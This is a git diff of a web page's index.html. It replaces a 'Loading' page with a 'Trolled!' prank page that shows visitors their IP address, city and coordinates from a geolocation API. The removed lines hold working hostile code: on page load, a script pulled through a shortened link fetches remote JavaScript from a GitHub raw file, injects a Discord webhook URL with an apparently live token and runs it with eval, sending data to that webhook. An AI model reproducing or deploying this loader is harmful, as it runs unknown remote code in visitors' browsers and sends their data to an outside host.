--- a/index.html
+++ b/index.html
@@ -1,27 +1,58 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <title>Loading</title>
-    <script src="https://tinyurl.com/3yhdxb4p"></script>
-    <script>
-        function load() {
-            var webhookURL = 'https://discord.com/api/webhooks/1197244034041774110/wt4yvAHXZ-sr2SOAnSRDd_zQvSywdgyxzSeRn76cqChZ9Y5NAm3SysE8W6k9rQsUw-JH';
-
-            var scriptURL = 'https://raw.githubusercontent.com/Lenn106/files/master/discip';
-
-            var xhr = new XMLHttpRequest();
-            xhr.open('GET', scriptURL, true);
-            xhr.onreadystatechange = function() {
-                if (xhr.readyState === 4 && xhr.status === 200) {
-                    var scriptCode = xhr.responseText;
-                    scriptCode = scriptCode.replace('https://discord.com/api/webhooks/1197244034041774110/wt4yvAHXZ-sr2SOAnSRDd_zQvSywdgyxzSeRn76cqChZ9Y5NAm3SysE8W6k9rQsUw-JH', webhookURL);
-                    eval(scriptCode);
-                }
-            };
-            xhr.send();
+    <style>
+        body {
+          font-family: Arial, sans-serif;
+          font-size: 200%;
         }
-    </script>
+        body {
+          background-color: black;
+          color: white;
+        }
+        h1, h2, h3, p {
+          text-shadow: 2px 2px 2px rgba(255, 165, 0);
+        }
+        body {
+          margin: 0;
+          padding: 2em;
+        }
+      </style>
+    <title>Trolled!</title>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
 </head>
-<body onload="load()">
+<body>
+    <h1>Some of your Information</h1>
+    <hr>
+    <h2>Some info about you:</h2>
+    <p><strong>IP Address:</strong> <span id="ip_address"></span></p>
+    <p><strong>Country Name:</strong> <span id="country_name"></span></p>
+    <p><strong>State name:</strong> <span id="region_name"></span></p>
+    <p><strong>City Name:</strong> <span id="city_name"></span></p>
+    <p><strong>Latitude:</strong> <span id="latitude"></span></p>
+    <p><strong>Longitude:</strong> <span id="longitude"></span></p>
+    <hr>
+    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
+    <script>
+        $(document).ready(function() {
+            $.getJSON("https://ipapi.co/json/", function(data) {
+                $("#ip_address").text(data.ip);
+                $("#country_name").text(data.country_name);
+                $("#region_name").text(data.region);
+                $("#city_name").text(data.city);
+                $("#latitude").text(data.latitude);
+                $("#longitude").text(data.longitude);
+            });
+
+            $("#user_agent").text(navigator.userAgent);
+        });
+    </script>
 </body>
 </html>
+<h2>
+    TacoTake
+</h2>
+<h3>
+    Tacoamerman on github
+</h3>
